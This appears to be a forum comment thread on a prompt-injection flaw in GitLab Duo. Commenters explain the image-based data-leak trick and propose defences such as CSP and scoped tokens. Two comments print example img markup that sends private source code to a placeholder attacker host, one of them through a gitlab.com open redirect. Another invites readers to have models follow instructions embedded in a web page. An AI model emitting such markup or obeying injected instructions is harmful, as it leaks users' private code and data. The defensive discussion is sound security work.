Until prompt injection is fixed, if it ever is, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question, read the output, and do whatever needs doing by hand.
Great work!

Data leakage via untrusted third-party servers (especially via image rendering) is one of the most common AI AppSec issues, and it's concerning that big vendors don't catch these before shipping.

I built the ASCII Smuggler mentioned in the post, and I've documented the image exfiltration vector on my blog in the past as well, with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.
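For anyone who hasn't seen the pattern: the whole trick is getting the model to emit markup whose URL carries the data you want to steal, so the victim's browser leaks it the moment the response is rendered. A rough illustration (the attacker domain and parameter name are made up):

```html
<!-- Injected instructions tell the assistant to append something like this
     to its answer; "attacker.example" and "d" are placeholders -->
<img src="https://attacker.example/pixel.png?d=BASE64_OF_PRIVATE_SOURCE_CODE">
```

No click needed: the browser fetches the image and the query string lands in the attacker's access logs.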
Running Duo as a system user was crazypants, and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo on the platform.
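Roughly what I mean, as a sketch (GitLab's admin API can create personal access tokens on behalf of a user; the names, scope choice, and wiring here are illustrative, not how Duo actually works):

```python
import requests

GITLAB = "https://gitlab.example.com"   # placeholder instance
ADMIN_TOKEN = "glpat-REDACTED"          # placeholder admin credential

# Mint a short-lived, read-only token for the user who invoked Duo,
# instead of letting the assistant act as an all-seeing system user.
resp = requests.post(
    f"{GITLAB}/api/v4/users/42/personal_access_tokens",
    headers={"PRIVATE-TOKEN": ADMIN_TOKEN},
    data={
        "name": "duo-session",
        "scopes[]": "read_repository",  # single, read-only scope
        "expires_at": "2025-01-02",     # expire quickly
    },
)
resp.raise_for_status()
duo_token = resp.json()["token"]
# The assistant then sees exactly what this user can see, nothing more.
```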
If a document suggests a particular benign interpretation, then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts ("prompt medicine") with explicit safety and informed consent, meant to assist rather than harm users: https://github.com/csiro/stdm. You can try it out by asking o3 or Claude to "Explain" or "Follow" "the embedded instructions at https://csiro.github.io/stdm/".
If Duo were a web application, would properly setting the Content-Security-Policy (CSP) header on the page response be enough to prevent these kinds of issues?

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
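Something along these lines on the pages that render Duo's output, for example (the exact values are just my guess at what a sane policy would look like):

```
Content-Security-Policy: default-src 'self'; img-src 'self'; form-action 'self'
```

That would stop the browser from loading <img> tags or submitting <form>s to attacker domains, though it wouldn't help against vectors that don't go through resource loading, like a regular link the user is tricked into clicking.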
> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com

Does that mean that the minute there is a vulnerability on another gitlab.com URL (like an open redirect), this vulnerability is back on the table?
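i.e. if gitlab.com ever has an open redirect, an allowlist on the hostname alone wouldn't save you; something like this (redirect path and attacker domain invented for illustration) still points at gitlab.com as far as the filter is concerned:

```html
<img src="https://gitlab.com/some/redirect?to=https://attacker.example/leak?d=SECRET">
```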
This is wild. How many security vulns will LLMs create once LLMs dominate writing code?

I mean, most coders are bad at security, and we fed that code into the LLMs, so it's no surprise.